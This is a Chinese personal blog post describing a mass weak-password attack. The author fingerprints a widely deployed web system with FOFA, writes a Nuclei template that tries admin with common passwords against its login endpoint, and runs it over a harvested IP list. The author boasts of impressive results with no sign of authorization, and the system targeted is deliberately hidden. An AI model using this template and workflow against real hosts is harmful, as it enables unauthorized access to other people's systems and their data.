0%

神器nuclei与活学活用

事情的起因是最近又开始内耗了,且找不到症结

然后这段时间某人又开始觉得自己菜了,无能狂怒的某人决定证明一下自己

刚巧意外的遇到了一个有趣的思路,想了想好久没更新博客了值得一写

再加上小伙伴的辛勤催更,终于这篇笔记诞生了,感谢。

锁定目标

我的主要工作并不是渗透测试,所以想干点什么只能自己找自己学

寻找资产肯定离不开测绘工具,fofa和hunter,借助它们可以轻松搜罗自己想要的目标

那么,我们有一个摆在眼前的关键任务,该怎么找目标?找什么样的目标?

渗透往往都是从已知的部分下手,比较经典的有各种OA系统,或者各个cms爆出来的Nday、1day等等

之前有个学员,安排工作去上班了,客户被勒索了向我求助,系统用的是某家的财务系统,现在的黑产利用思路也在实时更新,那些商业软件的漏洞也是黑客们利用的对象。那既然已经被全网利用那么多轮,各家企业肯定也涨了记性,不放在公网或者修修补补添置安全设备。为了避免麻烦提升产出,就不从这里出发了。

再或者,拿一套源码直接派大哥现场审0day

但我不是那种大哥,代码水平差劲的很,遂放弃(此处诚邀大哥们带我学习)

剩余的就是弱口令之神的战场了,钓鱼的可能性不是很高暂且不讨论

接下来,我们就要寻找一个理想的目标了:大规模的被使用、有源码、弱口令出现概率大、安全意识有待提升、不怎么注重网络安全的资产与服务。

那上哪儿去这么找天大的好东西呢?

(此处放一只小狗头)

Nuclei脚本与利用

这玩意儿太好用了真的,你可以什么都不会,但你必须学会写Nuclei利用jio本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
id: 666

http:
- raw:
- |
POST /login HTTP/1.1
Host:{{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

username={{username}}&password={{password}}

attack: clusterbomb
payloads:
username:
- admin
password:
- 123456
- admin
- admin123
- admin@123
stop-at-first-match: true

matchers-condition: and
matchers:
- type: word
words:
- '"success":true'
condition: and
- type: status
status:
- 200

隐去了一些内容,为了避免不必要的麻烦哈哈哈 感兴趣的可以单独跟我聊

比较简单,没有什么难度,重点在于到底拿什么系统开了刀(滑稽

接下来上一下FOFA-view

1
fid="?????" && country="您随意"

根据找到的系统的指纹用测绘去搜就行了

抛砖引玉,随便限制了几个地区,范围相当之广。我们就随便试试看好了

1
nuclei -l ip.txt  -t 666.yaml -o results.txt  

太爽了,太爽了,指哪儿打哪儿,这玩儿意真厉害。就是不知道Nucle支持不支持被动扫描,我没找着

感觉自己这篇文章比较水,毕竟思路蛮简单的,重点在于你的目标是什么。

但只要方向不出错,利用起来越简单,杀伤力就越大。(就好比此次渗透,自我感觉成果惊人)

这下破案了,内耗就是没搞渗透导致的,以后定期开展老年复健运动


泉眼无声惜细流,树阴照水爱晴柔,小荷才露尖尖角,早有蜻蜓立上头

本文结束,感谢您的阅读看到这里的师傅博主非常感谢